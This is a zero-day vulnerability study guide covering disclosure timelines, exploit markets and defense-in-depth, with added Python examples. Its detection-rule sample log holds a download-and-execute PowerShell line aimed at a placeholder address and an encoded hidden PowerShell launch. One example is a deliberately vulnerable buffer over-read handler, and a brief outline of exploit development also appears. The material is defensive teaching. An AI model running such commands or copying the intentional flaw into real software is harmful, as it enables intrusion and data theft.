Zero-day (computing) Study Guide
📖 Core Concepts
Zero‑day vulnerability – a security flaw unknown to the vendor (or known but not yet fixed) and therefore without an available patch; the "zero" is the number of days the vendor has had to fix it.
Alive vs. dead vulnerability – alive: not publicly known (still a zero‑day); dead: publicly disclosed, yet still exploitable on every system where the fix has not been deployed.
Exploit – the code or method that leverages a vulnerability to gain unauthorized access or execute malicious actions.
Defense‑in‑depth – layered security controls so an attacker must breach multiple barriers before succeeding.
Disclosure timeline – the sequence from discovery (Day 0) → reporting → patch development → public disclosure.
Market tiers – white‑market (bug‑bounty programs), gray‑market (government/intelligence), black‑market (organized crime).
---
📌 Must Remember
Zero‑days are most dangerous because no patch exists; all systems running the vulnerable component remain at risk.
Value curve: a zero‑day’s market price collapses once it becomes public knowledge (patchable).
Primary buyers: governments (gray market) > organized crime (black market) > vendors/bug‑bounty programs (white market).
Patch latency: months are typical; some vulnerabilities never receive a patch.
Defense‑in‑depth mitigates zero‑day impact even when a patch is unavailable.
Disclosure debate: secrecy enables offensive use; disclosure enables remediation.
Half‑day attacks: exploits built shortly after a patch appears (often by diffing the patched and unpatched code to locate the flaw), targeting systems that have not yet applied it.
---
🔄 Key Processes
Vulnerability Lifecycle
Discovery (Day 0) → researcher finds flaw.
Reporting → researcher notifies vendor/third‑party.
Patch Development → vendor writes fix (weeks‑months).
Public Disclosure → details released after the patch ships or after an agreed deadline expires (90 days is common).
Dead status → vulnerability disclosed but still unpatched.
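Worked example, added here and not part of the original guide: the lifecycle above as a small state classifier over dates. The 90‑day deadline, the `VulnRecord` fields and the sample dates are assumptions for illustration; "half‑day" is added as a separate state for the window between patch release and deployment, since that is the window the guide's half‑day attacks target.

```python
from __future__ import annotations
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Optional

# Assumed policy: the vendor gets 90 days from the report before details go public.
DISCLOSURE_DEADLINE_DAYS = 90


@dataclass
class VulnRecord:
    """One flaw's timeline. Every date is optional because most are unknown at first."""
    label: str                              # hypothetical tracking name, not a real ID
    discovered: date
    reported: Optional[date] = None         # vendor notified
    patch_released: Optional[date] = None   # fix available from the vendor
    disclosed: Optional[date] = None        # details made public
    deployed: Optional[date] = None         # fix installed on *our* systems


def _happened(d: Optional[date], today: date) -> bool:
    return d is not None and d <= today


def status(v: VulnRecord, today: date) -> str:
    """Classify the flaw as of `today` using the guide's terms plus a defender's extra states."""
    if _happened(v.deployed, today):
        return "patched"        # no longer exploitable on our systems
    if _happened(v.patch_released, today):
        return "half-day"       # fix exists and can be diffed; we have not applied it yet
    if _happened(v.disclosed, today):
        return "dead"           # public knowledge, no fix yet
    return "alive"              # still a zero-day


def vendor_days(v: VulnRecord, today: date) -> int:
    """Days the vendor has had to respond; this count is the 'zero' in zero-day."""
    if not _happened(v.reported, today):
        return 0
    return (today - v.reported).days


def disclosure_deadline(v: VulnRecord) -> Optional[date]:
    """Date after which the reporter may publish even without a patch (assumed policy)."""
    if v.reported is None:
        return None
    return v.reported + timedelta(days=DISCLOSURE_DEADLINE_DAYS)


def days_exposed(v: VulnRecord, today: date) -> int:
    """Exposure window for our systems: from discovery until our deployment (or today)."""
    end = v.deployed if _happened(v.deployed, today) else today
    return (end - v.discovered).days


# Constructed sample timeline (not a real vulnerability): the vendor used the whole window.
SAMPLE = VulnRecord(
    label="example-flaw-1",
    discovered=date(2024, 1, 10),
    reported=date(2024, 1, 12),
    patch_released=date(2024, 3, 5),
    deployed=date(2024, 3, 20),
    disclosed=date(2024, 4, 11),
)

if __name__ == "__main__":
    for d in (date(2024, 2, 1), date(2024, 3, 10), date(2024, 3, 25)):
        print(d, status(SAMPLE, d), "vendor days:", vendor_days(SAMPLE, d))
    print("deadline:", disclosure_deadline(SAMPLE),
          "exposed:", days_exposed(SAMPLE, date(2024, 6, 1)))
```

Note that the classifier checks deployment before patch release and patch release before disclosure: a patched system is safe regardless of what is public, and a released patch is effectively public even if the advisory is not, because attackers can diff it.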
Defense‑in‑Depth Implementation
Identify critical assets.
Apply preventive controls (e.g., MFA, least‑privilege).
Deploy detection controls (e.g., EDR, anomaly monitoring).
Establish response procedures (containment, forensics).
Verify each layer works together; test for gaps.
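Added example (not from the original guide) for the detection‑control step: a behaviour‑based rule set run over constructed process‑creation events. The field names (`host`, `parent_image`, `image`, `cmdline`), the allow‑lists and the log lines are all assumptions; the point is that the rules key on what the attacker does after the exploit runs, so they still fire when the initial flaw is a zero‑day that no signature knows about.

```python
from __future__ import annotations
import json
from dataclasses import dataclass
from typing import Dict, List

# Constructed lists for the example. A real deployment derives them from its own
# baseline of normal parent/child process pairs.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


@dataclass
class Alert:
    rule: str
    host: str
    parent: str
    child: str
    cmdline: str


def _basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> Dict[str, str]:
    """One JSON object per line (constructed schema, loosely modeled on EDR process-create events)."""
    return json.loads(line)


def evaluate(event: Dict[str, str]) -> List[Alert]:
    """Behavioural rules: no knowledge of the exploited flaw is needed."""
    parent = _basename(event["parent_image"])
    child = _basename(event["image"])
    cmd = event.get("cmdline", "")
    lowered = cmd.lower()
    found: List[Alert] = []
    # A document viewer has no business launching a command interpreter.
    if parent in OFFICE_APPS and child in SHELLS:
        found.append(Alert("office-app-spawns-shell", event["host"], parent, child, cmd))
    # Encoded or download-and-execute PowerShell is a classic second stage.
    if child in POWERSHELL and ("-enc" in lowered or "downloadstring" in lowered or "iex" in lowered):
        found.append(Alert("suspicious-powershell", event["host"], parent, child, cmd))
    return found


def scan(lines: List[str]) -> List[Alert]:
    return [a for line in lines for a in evaluate(parse_event(line))]


# Constructed sample log: three benign events and two that look like the
# post-exploitation stage of a malicious document.
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"host": "ws01", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe", "cmdline": "splwow64.exe"},
    {"host": "ws01", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "ws02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')\""},
    {"host": "ws03", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe https://example.com"},
    {"host": "ws03", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.host}: {a.parent} -> {a.child} :: {a.cmdline}")
```

The first rule fires on the second event even though nothing identifies the document flaw that led to it; that is the property a detection layer needs when the preventive layer (the patch) does not exist yet. The substring matches in the second rule are deliberately crude and would need tuning against a real baseline.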
Zero‑Day Exploit Development (high‑level)
Reconnaissance of target software.
Identify code paths lacking bounds checks or sanitization.
Craft payload that bypasses existing mitigations.
Test against hardened environments.
Package for delivery (phishing, drive‑by, supply‑chain).
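Added example, not code from the original guide: the kind of flaw the second step hunts for, a length field trusted without a bounds check, shown beside the hardened handler. The record format, the `echo_*` functions and the simulated memory arena are constructed for illustration; a Python slice cannot crash, so the arena stands in for the adjacent heap memory that a C program would read past its buffer.

```python
import struct
from typing import Optional, Tuple

# Record layout (constructed protocol): 1-byte type | 2-byte big-endian declared
# payload length | payload. The server is supposed to echo the payload back.
HEADER = struct.Struct(">BH")


def make_request(payload: bytes, declared_len: Optional[int] = None) -> bytes:
    """Build a request; `declared_len` lets a malicious client lie about the payload size."""
    n = len(payload) if declared_len is None else declared_len
    return HEADER.pack(0x01, n) + payload


def build_arena(request: bytes, neighbour: bytes) -> bytearray:
    """Simulated process memory: the received request sits directly before other live data.
    In a real heap that neighbour could be another connection's buffer, keys or cookies."""
    return bytearray(request + neighbour)


def echo_vulnerable(arena: bytearray, received_len: int) -> bytes:
    """Trusts the length field inside the record: the code path an attacker looks for."""
    _, declared = HEADER.unpack_from(arena, 0)
    start = HEADER.size
    # BUG: `declared` is never compared with `received_len`, so the copy reads past
    # the request into whatever follows it (an over-read, the same class as Heartbleed).
    return bytes(arena[start:start + declared])


def echo_fixed(arena: bytearray, received_len: int) -> Optional[bytes]:
    """Bounds-checked version: the declared length must fit inside the bytes actually received."""
    if received_len < HEADER.size:
        return None                         # header itself is truncated
    _, declared = HEADER.unpack_from(arena, 0)
    start = HEADER.size
    if declared > received_len - start:
        return None                         # record claims more payload than was sent: drop it
    return bytes(arena[start:start + declared])


# Constructed neighbour data standing in for an adjacent heap object.
NEIGHBOUR = b"Cookie: session=s3cr3t-token-9f1c; user=admin"


def run_case(payload: bytes, declared_len: Optional[int] = None) -> Tuple[bytes, Optional[bytes]]:
    """Return (vulnerable_output, fixed_output) for one request against the simulated memory."""
    req = make_request(payload, declared_len)
    arena = build_arena(req, NEIGHBOUR)
    return echo_vulnerable(arena, len(req)), echo_fixed(arena, len(req))


if __name__ == "__main__":
    print("honest client:", run_case(b"hello"))
    print("lying client :", run_case(b"hi", declared_len=64))
```

With an honest client both handlers behave identically, which is why the flaw survives ordinary testing; only the lying request exposes the difference, and that is exactly the input a fuzzer or a reviewer tracing untrusted length fields is trying to produce. The fix compares the attacker‑controlled length against the size the server itself measured, never against another field the attacker supplied.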
---
🔍 Key Comparisons
Zero‑day vs. Known vulnerability
Zero‑day: no patch, unknown to vendor, high impact.
Known: patch exists, mitigations available, lower stealth.
White‑market vs. Gray‑market vs. Black‑market buyers
White: rewards researchers, aims for disclosure.
Gray: government/intelligence, may stockpile or use offensively.
Black: criminal groups, prioritize immediate profit, often use “half‑day” attacks.
Alive vs. Dead vulnerability
Alive: not publicly known; the vendor has had zero days to respond.
Dead: disclosed but unpatched; still exploitable until fix is deployed.
---
⚠️ Common Misunderstandings
“Zero‑day = brand‑new software.”
False – any mature product can contain an undisclosed flaw.
“All organizations patch immediately.”
False – patch rollout can be delayed by testing, compatibility, or resource constraints.
“Only criminals buy zero‑days.”
False – governments and intelligence agencies are the largest purchasers.
“Stockpiling is always beneficial.”
Misleading – it prolongs user exposure if the flaw stays secret.
---
🧠 Mental Models / Intuition
“Undiscovered disease” analogy: a zero‑day is like a pathogen no one knows exists; treatment (patch) can’t be given until it’s identified.
Layered cake model: each security layer is a cake tier; a zero‑day exploit must cut through every tier to reach the centre (the critical asset), and each extra tier is another chance to stop or detect it.
---
🚩 Exceptions & Edge Cases
Some zero‑days are unpatchable due to architectural limitations.
Half‑day attacks exploit the window after a patch is released but before all systems update.
Certain air‑gapped systems may be immune to network‑based zero‑day exploits but vulnerable to supply‑chain or removable‑media attacks.
---
📍 When to Use Which
Patch‑first vs. defense‑in‑depth
Use patches when a fix is available and can be deployed without breaking critical functions.
Rely on defense‑in‑depth when no patch exists, when patch rollout is slow, or for high‑value assets.
Disclosure vs. stockpiling
Disclose if the vulnerability poses widespread risk and a timely patch is feasible.
Stockpile only when the exploit offers unique strategic advantage and the risk of prolonged exposure is acceptable.
---
👀 Patterns to Recognize
High‑profile breaches often mention “zero‑day” → expect limited public information and no patch at the time of attack.
Value drop after public disclosure → once a vulnerability appears in a CVE database its zero‑day price falls sharply, because defenders can now patch or mitigate it.
Increased exploit difficulty → newer software with built‑in mitigations (ASLR, DEP) correlates with longer exploit‑development timelines.
---
🗂️ Exam Traps
Confusing "zero‑day" with "Day 0 of an attack."
The "zero" counts the days the vendor has had to fix the flaw, not the days since an attack began.
Assuming every disclosed vulnerability is already patched.
“Dead” status means disclosed but still unpatched; exploitation may continue.
Choosing “stockpile” as the default policy.
Exam may test knowledge that stockpiling can increase user exposure; not always the optimal choice.
Mix‑up of market tiers – some questions may list “government agencies” under white‑market; remember they belong to the gray‑market.